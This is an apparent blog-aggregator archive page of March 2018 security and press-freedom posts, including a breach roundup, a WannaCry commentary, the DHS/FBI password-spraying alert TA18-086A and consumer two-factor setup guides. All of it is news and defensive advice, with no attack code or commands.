Monthly Archives: March 2018

New Traffic Light Protocol (TLP) levels for 2018

The Traffic Light Protocol should be familiar to anyone working with sensitive data, with levels RED, AMBER, GREEN and WHITE being used to specify how far information can be shared. In recent years it has become clear that these four levels are not enough, so the United Nations International Committee on Responsible Naming (UN/ICoRN) has introduced nine new TLP levels for implementation from the

Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested

Under Armor announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.

The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”

MyFitnessPal also said that it would be requiring users to change their passwords and is urging users to do so immediately. The company is also urging users to review their accounts for suspicious activity as well as to change passwords on any other online accounts that used the same or a similar password to their now-breached MyFitnessPal credentials.

It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.


Other trending cybercrime events from the week include:

  • Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Storemont in Northern Ireland is warning all staff of a cyber-attack targeting email accounts with numerous password attempts, and a number of accounts were compromised due to the attack. Shutterfly is notifying customers that their personal information may have been compromised due to an employee’s credentials being used without authorization to access its Workday test environment.
  • Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
  • Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
  • Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbankak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.

Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.

The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year they had created a more sophisticated version of the malware known as Carbanak, which was used by the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.

“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”

Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”

The accused FBI whistleblower indicted by Trump’s DOJ allegedly leaked secret rules for spying on reporters

DOIG cover

The Trump Justice Department escalated its crackdown on journalists’ sources and whistleblowers this week, charging former FBI special agent Terry Albury with two counts under the Espionage Act for allegedly leaking information to an unnamed news outlet, widely believed to be The Intercept.

The case is yet another example of the outrageous—and recently, far too common—use of the World War I-era law, to persecute the sources of journalists for the crime of informing the American public. The fact that whistleblowers have been thrown in jail with increasing regularity using a law meant for spies should be an outright scandal. As First Look Media, The Intercept’s parent company, said through their Press Freedom Fund, “The misuse of the Espionage Act chills truth tellers, impedes investigative reporting, and compromises the democratic process.”

But it’s also important to understand what Mr. Albury is alleged to have leaked and how it makes him a true whistleblower. News reports indicate he is accused of providing The Intercept documents related to its “FBI’s Secret Rules” reporting project, an important series of articles that looks into how the FBI secretly conducts investigations.

Notably, the very first story The Intercept published in that series was about a document containing the FBI’s classified rules for specifically targeting journalists with National Security Letters (NSLs), the controversial and due process-free surveillance tool that the agency can serve on telecom companies like AT&T and Verizon to spy on journalists and root out their sources.

The Justice Department’s strict rules for when they can and can’t conduct surveillance of journalists are supposed to governed by the agency’s “media guidelines,” which the Obama administration updated and strengthened after several embarrassing scandals when the Obama-era Justice Department was caught surveilling journalists. But critically, NSLs are completely exempt from those rules.

Instead, the rules for using NSLs against journalists are in the classified appendix of the FBI’s “Domestic Investigations and Operations Guide” (DIOG), under the heading “National Security Letters for Telephone Toll Records of Members of the News Media or Media Organizations.” The secret rules allow the Justice Department to use NSLs with virtually none of the restrictions or safeguards that are in place if they attempted to get a subpoena or court order for a journalist’s private telephone toll records. You can see the leaked version of the rules from here:

Along with Knight First Amendment Institute at Columbia, we are currently suing the Justice Department under the Freedom of Information Act for the current versions of these documents.

But as you can see from the leaked 2013 version, it’s absurd these rules were ever classified in the first place. There’s nothing “damaging” to national security for the public to know the FBI’s “approval requirements” consist of merely getting an additional sign off from a superior to target a journalist with an NSL. It’s clear from looking at the document that the classification system is being abused to cover up embarrassing and controversial practices which have no business being stamped secret.

Instead, it’s likely that the government wants these rules kept secret so that the FBI can continue to circumvent the DOJ media guidelines and spy on journalists in secret, without facing any public scrutiny of the practice.

The prosecution of Mr. Albury is outrageous, but if he was The Intercept’s source, then he exposed the government’s secret powers to spy on news organizations with no oversight. For that, he should be viewed by journalists as a hero.

Disclosure: First Look Media, The Intercept’s parent company, provides Freedom of the Press Foundation with an annual grant and three employees of First Look, Glenn Greenwald, Laura Poitras, and Micah Lee, sit on FPF’s board. They were not consulted in the drafting of this blog post.

State of Software Security: Checking the Pulse of the Healthcare Industry

Over the past year, our scans of thousands of applications and billions of lines of code found a widespread weakness in applications, which is a top target of cyber attackers. And when you zoom in from a big picture view down to a micro-level, there are a few industries that are struggling to keep up with the rapidly changing cybersecurity landscape and combat the tactics of malicious actors today. 

One of these sectors is healthcare. Healthcare organizations hold some of the most sensitive personal data, yet they have been victims of several high-profile breaches in recent years. In 2017 alone, healthcare data breaches increased, with one breach impacting more than one million individuals, and 14 breaches of more than 100,000 records. According to the CA Veracode 2017 State of Software Security report (SOSS), which includes scan data collected from our own platform over the past year, healthcare organizations made security strides, increasing OWASP policy compliance by an average nine percent between an application’s first and last scan. But healthcare applications had a high prevalence of flaws in the information leakage (55 percent) and cryptographic issues (52 percent) categories.

The Raw State of Untested Software

In theory, the growing awareness of security within the developer community should be prodding the overall body of coders to improve their daily programming best practices. Unfortunately, the stats don’t reflect this. We saw OWASP pass rates, for example, drop by about eight percentage points from last year. However, this may be related to the new companies added to the scan, including healthcare, hospitality and retail apps being scanned for the first time this year.

On the bright side, OWASP pass rates have improved by a statistically significant number compared to our initial data in 2010. And when organizations first scan their applications for vulnerabilities, they’re bound to find flaws. Still, we hope that our research into vulnerability prevalence would show a little bit of improvement on the raw state of software before security testing. If you’re looking for a silver lining, note that the lowest performing industries (healthcare and government) in last year’s SOSS study experienced the smallest declines in pass rate year-over year. That silver lining becomes a mere sliver when you look at the percentage of applications affected and the top three vulnerabilities in the healthcare industry, which includes information leakage (55.2 percent), cryptographic issues (51.5 percent) and code quality (35.1 percent).

And this year, we also took a peek at how many applications within an industry were undergoing their first policy scan as compared to the rest of the portfolio under current testing. A higher percentage of new applications undergoing their first policy can, such as healthcare, tends to suggest that those organizations are just getting started with their application security maturity process.

Meanwhile, healthcare among other industries on-boarded the most applications relative to the size of their portfolios. This could go a long way toward explaining their good performance in remediation from first scan to latest scan. With so many new applications added, these industries likely were able to take care of a lot of low-hanging fruit, namely easy-to-fix flaws that were newly found.

How to Scale Up Security Success

The good news is that it’s not all doom and gloom. For instance, the latest SOSS report highlights manufacturing and aerospace organizations have already made security part of their software development process. As a result, they have the highest OWASP pass rate on latest scan (30.5 percent) of any industry grouping, and the lowest proportion of applications undergoing their first assessment (nearly 40 percent). It goes to show that if you stick with a solid security program, improve security through testing and give your developers the resources they need for testing and remediation, then all industries will be able to improve their application security posture — including healthcare.

Our research shows that organizations that do testing and remediation are prioritizing the worst vulnerabilities, reducing flaw density on very high and high severity flaws at twice the clip of the overall field of vulnerabilities. Nevertheless, only 14 percent of the most severe flaws are fixed in under a month, and nearly 12 percent of applications have at least one high or very high severity flaw.

The latest SOSS report lets us think long and hard about where we need to go in order to achieve AppSec maturity. And while it seems like we are moving the application security needle slowly, there is a bright light at the end of the tunnel. With the right program in place, all industries can improve the state of software security. Looking to improve AppSec in your organization? Consider testing early and often, give developers the resources they need, and fix what you can, starting with the bugs that matter the most.


WannaCry after one year

In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.

It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, have whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.

Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).

Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug in an unpatched computer onto the raw Internet, without the benefit of a firewall, it'll get infected within an hour.

However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories imply some nefarious hacker activity that "targeted" Boeing, but that's unlikely.

We have now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.

Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading.

Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will continue to run, attacking more systems instead of immediately killing itself.

One solution to this would be to setup sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs all requests. This is trivially setup with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. The side effect is that it would make this killswitch kill WannaCry. WannaCry isn't sufficient reason to setup sinkhole servers, of course, but it's something I've found generally useful in the past.


Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry.

The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect.

Introducing @FOIAFeed, a Twitter bot that finds and shares Freedom of Information Act journalism

Not that kind of records

Freedom of the Press Foundation is launching @FOIAFeed today, a new project that aims to automatically find and surface reporting that uses the Freedom of Information Act or other public records laws to obtain source material.

@FOIAFeed is a Twitter bot that reads stories as they are published from over a dozen major news organizations, and posts links and excerpts to Twitter whenever it finds a relevant article. In our experience so far, the bot turns up new and important stories nearly every day. You can follow @FOIAFeed here.

There’s no doubt that the FOIA process is cumbersome, and in some ways, badly broken. But investigative journalism that digs into primary source documents obtained through public records laws is interesting and substantial work, and we like to shine a spotlight on that reporting.

@FOIAFeed's results show that public records laws enable that kind of investigation across a broad cross-section of subjects. In just the last few days, it has posted stories about the political rise of certain career officials in the Trump administration, links between campaign contributions and sting operations against men who patronize sex workers, and apparent age discrimination among employees at tech giant IBM.

Public records as a through-line between this diverse array of stories may not be obvious, but we hope that people interested in the mechanics of journalism will get some value out of seeing these stories compiled together.

Beyond that, we have two major goals for the @FOIAFeed project. One is to inspire journalists to see what their peers are doing with public records laws, and to hopefully find ways to push the envelope even further. We've heard from journalists that the world of FOIA requests can seem insular and intimidating, not least because of inadequacies in the law. Requests get ignored, while others take years and come back almost completely censored, like this recent Miami Herald story that was just picked up by @FOIAFeed:

Despite its flaws, FOIA can produce powerful results. We hope that a steady stream of examples can help reduce the threshold for journalists to dive in (or even for FOIA pros to pick up new ideas).

A second goal is to underscore the importance of public records laws in investigative reporting. Highlighting the tools that journalists use to report their stories can help advocates for those tools, both when there is opportunity to expand and improve them (as with the FOIA Improvement Act of 2016, for example) or when there is a need to defend them (as with the recent "cyber-security" exemption added to Michigan's public records law, or the successful push to prevent a gutting of the Washington Public Records Act).

Currently, @FOIAFeed is monitoring news stories from the Associated Press, Reuters, the Los Angeles Times, the New York Times, Buzzfeed News, the Washington Post, the Chicago Tribune, the Miami Herald, CNN, Gizmodo, ProPublica, The Intercept, and the Marshall Project. It relies on RSS feeds from those organizations, and we plan to expand in the coming days to cover more outlets that engage in public records reporting and offer such feeds.

Additionally, we will soon be releasing the underlying source code that powers @FOIAFeed, and we hope it will be useful to other potential bot developers. Our bot focuses on public records laws, but as we develop and generalize it, we think it could be used as a broader public news alert system on any topic you’d like.

Why I’m Going to RSA 2018: CA Veracode’s New SVP of Engineering

RSAC 2018

Paiman Nodoushan has been working at CA Veracode for about two months. In that time, he's met a lot of his peers and claims he already remembers over 50% of their names, no small feat. Jokes aside, he's been getting to know his team, our projects, and the ins and outs of our entire SaaS operation. In our quick interview, he describes the team at Veracode as hard working and passionate, and goes on to point out that:

"One thing that I don't think people actually realize is how difficult it is to build a whole SaaS operation. From pre-sales through sales, to engineering, product management, and to post-sales, connecting to all the backend systems that exist - it takes years for companies to go and build that."

We're lucky our Founders had the foresight to keep us focused on a SaaS model in our earliest days, and that we have a leader like Paiman joining us to help drive further improvements in those operations. Paiman is headed to the RSA Conference with many others from the CA Technologies and Veracode teams; this will be his first RSA Conference ever.

Why Attend RSA?

Paiman lists three things he's looking to accomplish at the RSA Conference this year:

  1. Meeting Customers
  2. Hearing from Competition
  3. Learning

Be sure to catch Paiman at the CA Veracode booth this year and watch the full interview below to get to know him some more.

Banks in Denial over Their Resilience to DDoS attacks

Are retail and investment banks in denial about being adequately protected from the frequent advanced DDoS attacks they’re getting hit with today? It is mid-March 2018 – just three months into the year and 3 major banks have already been taken offline by DDoS attacks, making global headlines. Reuters reported that ABN Amro, ING and Rabobank were targeted by hackers, temporarily disrupting online and mobile banking services at the end of January (Reuters Jan 29, 2018 Dutch tax office, banks hit by DDoS cyber attacks). Whatever DDoS attack protection they had in place proved to be insufficient.

So why are today’s DDoS attacks so successful against well-heeled financial institutions who spend more on cyber-security than most organizations spend on IT in total? The problem may lie with the “protection gap” within banks’ legacy DDoS attack protection solutions that have evolved over the last 20 years but focus principally on defending against large volumetric DDoS attacks. Banks typically rely on two DDoS architectural components:

Cloud DDoS Mitigation for elastic scalability during large volumetric attacks, and

Web Application Firewalls (WAFs) for encrypted traffic and to provide confidentiality and integrity for encrypted “Layer 7” banking applications

Legacy DDoS attack defenses often lack the automation required to provide real-time mitigation of today’s short-duration DDoS attacks. Corero’s analysis shows that even the largest banks frequently have this protection gap and it is the Achilles’ heel within their DDoS defenses.

From the Verizon DBIR graph below we see that Financial Services organizations are twice as likely to be hit with a DDoS attack than any other industry. Despite this fact, the protection gap paradox suggests that banks remain either in ignorance or denial and, consequently, haven’t adjusted their DDoS defenses to be resilient to the short, sharp DDoS attacks that dominate today. Corero’s primary research shows that, in 2017, 96% of DDoS attacks were less than 5 Gbps and 71% lasted 10 minutes or less.

DDoS Industry

2017 Verizon Data Breach Investigations Report (DBIR)

Protecting all IP addresses presents economic and compliance challenges for banks using this legacy DDoS attack prevention architecture:

  • Always-on cloud DDoS mitigation across all IP address ranges is eye-wateringly expensive, so even wealthy banks tend not to cover all IP addresses - leaving some of their IP addresses unprotected against DDoS attacks.
  • To cover encrypted traffic, they are required to surrender crypto-keys which risks personal data protection regulation non-compliance.

These challenges effectively create a “Catch 22” scenario where these banks can’t be fully protected even by always-on cloud DDoS defenses.

Consumers now demand and regulations require that banks (and other enterprises) keep their services available with zero downtime and that personal data privacy is guaranteed. As the Dutch experience has demonstrated, modern DDoS cyber-attacks pose a serious threat to both service availability and data security. Consequently, banks are at risk from trading outages, punitive regulatory fines, and customer churn.

There is good news for banks. Corero’s SmartWall® Threat Defense System can supplement their existing defenses to deliver fully automated, real-time protection against today’s DDoS attacks. SmartWall mitigates both the short, sharp attacks and the larger attacks including amplification attacks that exploit the recently publicized “Memcached” vulnerability. Learn more

TA18-086A: Brute Force Attacks Conducted by Cyber Actors

Original release date: March 27, 2018 | Last revised: March 28, 2018

Systems Affected

Networked systems


According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.

On February 2018, the Department of Justice in the Southern District of New York, indicted nine Iranian nationals, who were associated with the Mabna Institute, for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.


In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. 

Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
  • Using easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accounts
  • Using the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO portal or web-based application;
    • Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).
    • Attacks have been seen to run for over two hours.
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations.

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1][2]:

  • Use SSO or web-based applications with federated authentication method
  • Lack multifactor authentication (MFA)
  • Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)
  • Use inbox synchronization, allowing email to be pulled from cloud environments to remote devices
  • Allow email forwarding to be setup at the user level
  • Limited logging setup creating difficulty during post-event investigations


A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information;
  • Disruption to regular operations;
  • Financial losses incurred to restore systems and files; and
  • Potential harm to an organization’s reputation.


Recommended Mitigations

To help deter this style of attack, the following steps should be taken:

  • Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols.
  • Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.
  • Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.
  • Many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]

Reporting Notice

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI’s 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI’s national Press Office at or (202) 324-3691.


Revision History

  • March 27, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Protecting Yourself from a Data Breach Requires Two Step Authentication

Have you ever thought about how a data breach could affect you personally? What about your business? Either way, it can be devastating. Fortunately, there are ways that you can protect your personal or business data, and it’s easier than you think. Don’t assume that protecting yourself is impossible just because big corporations get hit with data breaches all of the time. There are things you can do to get protected.

  • All of your important accounts should use two-factor authentication. This helps to eliminate the exposure of passwords. Once one of the bad guys gets access to your password, and that’s all they need to access your account, they are already in.
  • When using two-factor authentication, you must first enter your password. However, you also have to do a second step. The website sends the owner of the account a unique code to their phone also known as a “one time password”. The only way to access the account, even if you put the password in, is to enter that code. The code changes each time. So, unless a hacker has your password AND your mobile phone, they can’t get into your account.

All of the major websites that we most commonly use have some type of two-factor authentication. They are spelled out, below:


The two-factor authentication that Facebook has is called “Login Approvals.” You can find this in the blue menu bar at the top right side of your screen. Click the arrow that you see, which opens a menu. Choose the Settings option, and look for a gold colored badge. You then see “Security,” which you should click. To the right of that, you should see Login Approvals and near that, a box that says “Require a security code.” Put a check mark there and then follow the instructions. The Facebook Code Generator might require a person to use the mobile application on their phone to get their code. Alternatively, Facebook sends a text.


Google also has two-factor authentication. To do this, go to, and then look for the blue “get started’ button. You can find it on the upper right of the screen. Click this, and then follow the directions. You can also opt for a text or a phone call to get a code. This also sets you up for other Google services, including YouTube.


Twitter also has a form of two-factor authentication. It is called “Login Verification.” To use it, log in to Twitter and click on the gear icon at the top right of the screen. You should see “Security and Privacy.” Click that, and then look for “Login Verification” under the Security heading. You can then choose how to get your code and then follow the prompts.


PayPal has a feature known as “Security Key.” To use this, look for the Security and Protection section on the upper right corner of the screen. You should see PayPal Security Key on the bottom left. Click the option to “Go to register your mobile phone.” On the following page, you can add your phone number. Then, you get a text from PayPal with your code.


Yahoo uses “Two-step Verification.” To use it, hover over your Yahoo avatar, which brings up a menu. Click on Account Settings and then on Account Info. Then, scroll until you see Sign-In and Security. There, you will see a link labeled “Set up your second sign-in verification.” Click that and enter your phone number. You should get a code via text.


The system that Microsoft has is called “Two-step Verification.” To use it, go to the website Look for the link on the left. It goes to Security Info. Click that link. On the right side, click Set Up Two-Step Verification, and then follow the prompts.


Apple also has something called “Two-Step Verification.” To use it, go to On the right is a blue box labeled Manage Your Apple ID. Hit that, and then use you Apple ID to log in. You should then see a link for Passwords and Security. You have to answer two questions to access the Security Settings area of the site. There, you should see another link labeled “Get Started.” Click that, and then enter your phone number. Wait for your code on your mobile phone, and then enter it.


LinkedIn also has “Two-Step Verification.” On the LinkedIn site, hover your mouse over your avatar and a drop-down menu should appear. Click on Privacy and Settings, and then click on Account. You should then see Security Settings, which you should also click. Finally, you should see the option to turn on Two-Step Verification for Sign-In. Turn that on to get your code.

These are only a few of the major sites that have two-step verification. Many others do, too, so always check to see if your accounts have this option. If they don’t, see if there is another option that you can use in addition to your password to log in. This could be an email or a telephone call, for instance. This will help to keep you safe.


Amazon’s Two-Step Verification adds an additional layer of security to your account. Instead of simply entering your password, Two-Step Verification requires you to enter a unique security code in addition to your password during sign in.

Without setting up Two Step authentication for your most critical accounts, all a criminal needs is access to your username, which is often your email address and then access data breach files containing billions of passwords that are posted all over the web. Once they search your username/email for the associated password, they are in.

Two factor locks them out.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

Is Your Small Business Staff Trained in Security Awareness?

The Ponemon Institute released a shocking statistic: about 80% of all corporate data leaks is due to human error. In other words, it only takes a single staff member to cause a huge issue. Here’s a scenario: Let’s say that you have an employee, Betty. Betty is lovely. We love Betty. But when Betty is checking her personal email during her lunch break and sees she has an offer that promises a 10-pound weight loss in only a week, she clicks the link. She wants to learn more about it, so she clicks the link in the email. What she doesn’t realize is that by clicking that link, she just installed a virus onto the computer. In addition, the virus now has access to your company’s network.

This was a very simple act, one that most of us do every day. However, this is why it is so important that your staff is up to date on security awareness. How can you do this? Here are some tips:

  • Present your staff with information about being aware of security, and then come up with a set up where you send them a link they want to click on. This is a process known as “phishing simulation.” If your staff members click on the links, and they probably will, it will take them to a safe page. However, on the page is a message telling them that they fell for a scam, and though they are safe this time, there could be great repercussions.
  • The staff members who click the link should be tested again. This way, you will know if the message got through.
  • Make sure when you give these tests that it isn’t predictable. Send the emails at different times of day and make sure they look different and have a different message. For instance, don’t send the “lose 10 pounds” email twice.
  • Think about hiring someone, a stranger, who will try to get your staff to give them sensitive information about your company over the phone, through email, or even in person. This is a valuable test, as it helps you to determine who the “weak links” are in your company.
  • Give your staff quizzes throughout the year to see who is paying attention to security.
  • You should focus on education, not discipline, when you are doing this. Don’t make them feel bad or punish them. Instead, make sure they know what they did wrong and work on not doing it again.
  • Ensure that your team knows that a data breach can also result in financial, legal, and criminal problems.
  • Schedule checks of workstations to see if any employee is doing something that might compromise your company’s sensitive data. This includes leaving information on a screen and walking away.
  • Explain the importance of security to your staff, and encourage them to report any activity that seems suspicious.
  • After training and testing your staff, make a list of all concepts that you want them to understand. Look at this list often, and then evaluate it time and time again to see if anything needs changed.
  • Don’t forget company officers. When company officers are omitted from this kind of training it poorly reflects on the organization. Some security personnel are afraid to put their Executives on the spot. That is a huge mistake. Security starts from the top.

Remember, there is nothing wrong with sharing tips with your staff. Post them around the office and keep reminding them to stay vigilant. This helps the information to remain fresh in their minds, and helps you to recognize those who are taking security, seriously.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

Inside the fight to prevent censorship of Indiana student journalists


Plainfield High School student journalist Anu Nattam (center) holding the special edition of her school magazine the day of testifying in favor of Bill 1016

Olivia McLellan: FOX59/CBS4

After a group of student journalists in Indiana published an issue of their high school magazine last October that focused on dating and relationships, the school implemented a policy of content review prior to publication. This, some students say, amounts to censorship that is compromising their journalistic education.  

The October issue of Plainfield High School publication, the Quaker Shaker, was the magazine’s first “special topic” edition, called the Shakedown. It explored the ins and outs of relationships in high school, including polls about the prevalence of sexting as well as more serious topics like dating violence. It even won an award, which marked the first time the publication had won a national-level prize.

But parents and school administrators took issue with the content of the issue, particularly the sexting poll and use of urban dictionary definitions of words like “polyamory” and “friends with benefits.” In particular, one family member of the school board president blasted the publication on social media, encouraging people to complain to the school and school board president, and even asked why local churches were not rising up.

Now, student journalists at Plainfield need administrative approval to publish. As a result of this pushback, Plainfield High School journalism adviser Michelle Burress said that an advisory committee has been set up to evaluate every publication before it goes to press. The principal must approve anything before it is published.

To Anu Nattam, a co-editor of the publication, this policy shows that her school wants her magazine staff to act as a public relations team rather than journalists. Since the policy was implemented, she said that they were forced to change the name of their special edition issues to the Shakeout. Nattam said the school argued that the name Shakedown had mafia connotations.

“We’ve also had to change quotes, and delete quotes for trivial things that make no sense,” Nattam said. She also notes that they were asked to change the cover photo of one magazine issue because merely it showed a picture of a clothed posterior.

But it is her responsibility as a student journalist, Nattam said, to report on issues that are relevant to the student body, even if they might be controversial.

“Filtering reports and restricting ideas is not only an injustice to student journalists, but to the people reading the stories we write. Ideas and facts that impact a student body are not always going to make a school look good. Just like in real life, not everything is sunshine and rainbows.”

Nattam’s adviser Michelle Burress said that now, students are self-censoring, and worry about everything they write coming under intense scrutiny. “They are shying away from topics that normally they would not hesitate to cover because they do not want to get shot down,” she said. “More than ever this year, students are saying that they do not want to be quoted or pictured in the news magazine or yearbook.”

